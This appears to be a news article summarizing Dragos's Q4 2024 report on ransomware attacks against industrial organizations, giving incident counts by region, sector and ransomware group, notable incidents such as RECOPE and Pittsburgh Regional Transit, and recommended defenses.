Industrial cybersecurity company Dragos revealed that during the fourth quarter of 2024, the ransomware threat landscape presented an increasingly dynamic ecosystem, with multiple ransomware groups refining their techniques, expanding their capabilities, and forming new alliances, intensifying attacks on industrial organizations. The data revealed no new ransomware variants were designed for industrial control systems (ICS). However, ransomware attacks are still affecting industrial organizations, leading to operational disruptions such as forced production halts, manual failovers, and supply chain interruptions.
“Throughout Q4 2024, newly branded or rebranded ransomware groups proliferated. Several leveraged leaked source code or formed partnerships with established adversaries, rapidly adopting advanced tactics, techniques, and procedures (TTPs),” Abdulrahman H. Alamri and Lexie Mooney, Dragos executives wrote in a company blog post this week. “In addition, many public resources indicated that nation-state adversaries openly aligned with ransomware operators, obscuring distinctions between financially driven and geopolitically oriented attacks. Collectively, these developments underscore a convergence of operational and strategic interests, resulting in increased theft of sensitive industrial data and both intended and unintended disruptions to industrial operations, ultimately causing prolonged downtime, safety risks, and financial losses for affected organizations.”
They noted that Dragos assesses with low confidence that ransomware groups operating under the ransomware-as-a-service (RaaS) model create opportunities for financially, ideologically, or politically motivated adversaries to advance espionage, sabotage, and financial objectives. By leveraging these platforms, adversaries minimize detection and maintain operational continuity, complicating the efforts of law enforcement agencies to identify and impose sanctions.
The post recognized that during the period, ransomware groups shifted tactics and alliances at a rapid pace. “Established operators such as RansomHub, LockBit3.0, and Play retained their dominance, while newly emerged or rebranded threats utilized modern infiltration methods and affiliate networks. Their focus on IT vulnerabilities, including unpatched VPN appliances, firewall firmware, and backup management solutions, led to operational disruptions in industrial environments.”
Furthermore, the industrial sector, particularly the manufacturing, transportation, and ICS equipment and engineering sectors, remained a primary target as adversaries employed advanced tactics and leveraged weaknesses in remote access solutions and credential practices.
During the quarter, Dragos observed the expansion of established ransomware groups and the emergence of new or rebranded operators focused on industrial environments. Adversaries frequently exploited VPN (virtual private network) appliances, firewall firmware, and backup management solutions to secure initial access, underscoring a continued reliance on low-barrier intrusion points. Ransomware operators demonstrated proficiency in targeting Windows, Linux, and ESXi systems and leveraged cloud-centric extortion methods to exfiltrate data and coerce victims.
The executives observed that although Dragos has not yet observed cloud-centric tactics directly impacting ICS, ransomware groups’ growing adoption of legitimate cloud services signals a shift that could further complicate detection and incident response in operational settings.
Dragos’s ongoing research shows an uptick in ransomware adversaries using cloud platforms to exfiltrate data before executing ransomware encryption. These adversaries frequently adopt Azure Storage Explorer and AWS S3 Transfer Acceleration, blending malicious activity with legitimate cloud traffic to evade detection. Although Dragos has not observed any OT-focused compromise resulting directly from these cloud-centric intrusion methods, adversaries who gain a foothold through such tactics can potentially escalate their attacks, impacting OT environments or critical IT systems that support industrial operations.
The executives added that multiple ransomware groups continued to leverage ‘living-off-the-land’ (LoTL) techniques by utilizing built-in Windows binaries (e.g., certutil.exe, PowerShell) to side-load or memory-inject malicious code, evading typical signature-based detection approaches. Notably, BlackBasta used specially crafted QR codes embedded within Microsoft Teams messages to trick employees into downloading remote monitoring tools, thereby creating post-exploitation footholds (i.e., establishing persistent access that allows adversaries to continue moving laterally, gathering intelligence, and re-infecting systems even if the initial intrusion is detected).
Ransomware incidents during the period continued to vary by region, with North America remaining the most frequently targeted area. As in previous quarters, the data demonstrates a global scope for ransomware threats, affecting diverse geographies and multiple sectors.
North America has 308 reported incidents, approximately 51 percent of global ransomware activity, with the U.S. accounting for most of these attacks. Europe had 168 incidents (approximately 28 percent of global ransomware activities). The U.K., Germany, and Italy remained top targets, with attacks primarily affecting manufacturing and transportation. In Asia, about 70 incidents were detected making up roughly 12 percent of global ransomware activities.
Dragos reported that South America recorded 19 incidents (approximately 3% of global ransomware activity). Brazil registered most attacks in the region, with most operations focusing on food and beverage manufacturing and transportation systems. The Middle East reported 13 incidents, roughly two to three percent of global ransomware events; Oceania faced a total of 14 incidents with Australia and New Zealand being the primary targets; and Africa had seven incidents, representing under two percent of global incidents with South Africa and Tunisia accounting for the most reported attacks.
The post also reported that the manufacturing sector remained the most impacted sector, with 424 observed incidents, accounting for 70 percent of ransomware activity; while industrial control systems (ICS) equipment and engineering experienced 58 incidents, representing 10 percent of total activity. The transportation sector encountered 69 incidents (around 11 percent); oil and natural gas (ONG) recorded 19 incidents ( about three percent); government and water sectors each faced five incidents ( about one percent each); mining reported four incidents; renewables sector faced three incidents; and datacenters experienced two incidents.
Dragos detailed that during the period, ransomware attacks continued to significantly disrupt industrial organizations, leading to operational halts, financial losses, and compromised data integrity. One of the notable incidents was the Refinadora Costarricense de Petróleo (RECOPE) in November, where Costa Rica’s state-owned energy provider, was forced to operate fully on manual processes after a ransomware attack disabled the digital systems supporting payment processing and fuel sales. Although no shortages or supply interruptions were reported, the loss of automated workflows markedly increased transaction times, caused personnel to rely on paper-based records, and remediation required assistance from external specialists.
Another incident updated in December affected beverage manufacturer Stoli Group experienced extensive IT infrastructure disruptions following a ransomware attack, eventually leading to bankruptcy filings for its U.S. subsidiaries. The incident rendered core systems, such as enterprise resource planning (ERP), forced employees to rely on manual data entry and undermined normal operations across Stoli’s global footprint. This large-scale change from digital workflows severely affected production schedules, supply chains, and overall financial performance.
Lastly, Dragos listed Pittsburgh Regional Transit (PRT) targeted in December, when a ransomware attack delayed bus and rail services for hours across Pittsburgh, affecting thousands of daily commuters. The interruption to key scheduling and ticketing platforms caused extended wait times, forced route alterations, and limited travelers’ ability to purchase new tickets or refill transit cards.
Dragos’ analysis of ransomware activity indicates further fragmentation in the ecosystem. Several groups demonstrated notable prevalence including LockBit3.0 accounted for 70 incidents (about 12 percent), maintaining a high level of activity despite law enforcement disruptions earlier in 2024; Play linked to 63 incidents ( about 10 percent). The group continues to focus on critical infrastructure and industrial victims; RansomHub reported 56 incidents (about nine percent), an aggressive RaaS model attracting affiliates from disrupted operations; heavily targeting industrial organizations; and Akira accounted for 43 incidents (about seven percent), known for double extortion tactics and cross-platform expansions.
The executives noted that Hunters International were involved in 26 incidents (about four percent), Dragos observed increased activities involving exploiting remote access vulnerabilities; BlackBasta linked to 25 incidents (about four percent) continues to deploy sophisticated social engineering and RMM-based infiltration; MeowLeaks reported 24 incidents ( about four percent) in the fourth quarter. Dragos identified a double extortion approach, which often emphasizes large-scale exfiltration of data to pressure victims into paying the ransom.
The post added that MedusaLocker and Cactus were involved in 22 incidents each (about four percent); BlackSuit accounted for 20 incidents, some of which caused operational impacts on water treatment and automotive suppliers; Qilin & Inc ransom reported 17 incidents each; and 8Base registered 15 incidents.
Dragos called upon organizations to prioritize key cybersecurity measures such as enforcing multi-factor authentication (MFA), monitoring critical ports, maintaining offline backups, and strengthening remote access controls. In addition, enhanced personnel training and periodic network architecture reviews are vital for staying ahead of continually adapting ransomware techniques.
As the ransomware ecosystem continues to fragment and adapt, proactive defenses, threat intelligence sharing, and collaborative mitigation efforts will be essential to safeguarding critical infrastructure and industrial operations into the next quarter and beyond.
